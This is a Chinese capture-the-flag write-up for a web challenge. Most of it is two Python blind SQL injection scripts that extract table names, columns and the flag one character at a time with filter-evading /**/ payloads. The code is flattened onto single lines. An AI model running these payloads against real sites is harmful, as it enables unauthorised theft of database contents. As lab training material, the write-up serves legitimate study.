题目分析
打开题目后,有三个文章
随便点一个之后发现网址上有个后缀 ?id=2
应该是get传参的注入了
在后缀上加 ?id=1||1 显示全部文章,可能是整形注入,还是盲注
他这个过滤了空格,用/**/代替(详见web6 wp)
解题过程
盲注都是一个字一个字对比,很麻烦,所以这里用大佬的脚本做题
import requests s=requests.session() url='http://376f6454-37f5-47df-aa98-bfd375f0f8d9.challenge.ctf.show/index.php' table="" for i in range(1,45): print(i) for j in range(31,128): #爆表名 flag payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j)) #爆字段名 flag #payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j)) #读取flag #payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j)) ra = s.get(url=url + '?id=0/**/or/**/' + payload).text if 'I asked nothing' in ra: table += chr(j) print(table) break
附上羽师傅的脚本
url = "http://124.156.121.112:28069/?id=-1'/**/" def db(url): #爆库名 for i in range(1,5): for j in range(32,128): u= "or/**/ascii(substr(database()/**/from/**/"+str(i)+"/**/for/**/1))="+str(j)+"#" s = url+u print(s) r = requests.get(s) if 'By Rudyard Kipling' in r.text: print(chr(j)) def table(url): #爆表名 for i in range(4): table_name='' for j in range(1,6): for k in range(48,128): u=id="||/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/1/**/offset/**/"+str(i)+")/**/from/**/"+str(j)+"/**/for/**/1))="+str(k)+"#" s = url+u print(s) r = requests.get(s) if 'By Rudyard Kipling' in r.text: table_name+=chr(k) print(table_name)
依次跑得数据表,字段名,字段的值
运行了好几次,一直是到这一步就停了,就补充了个反括号去提交flag
竟然通过了
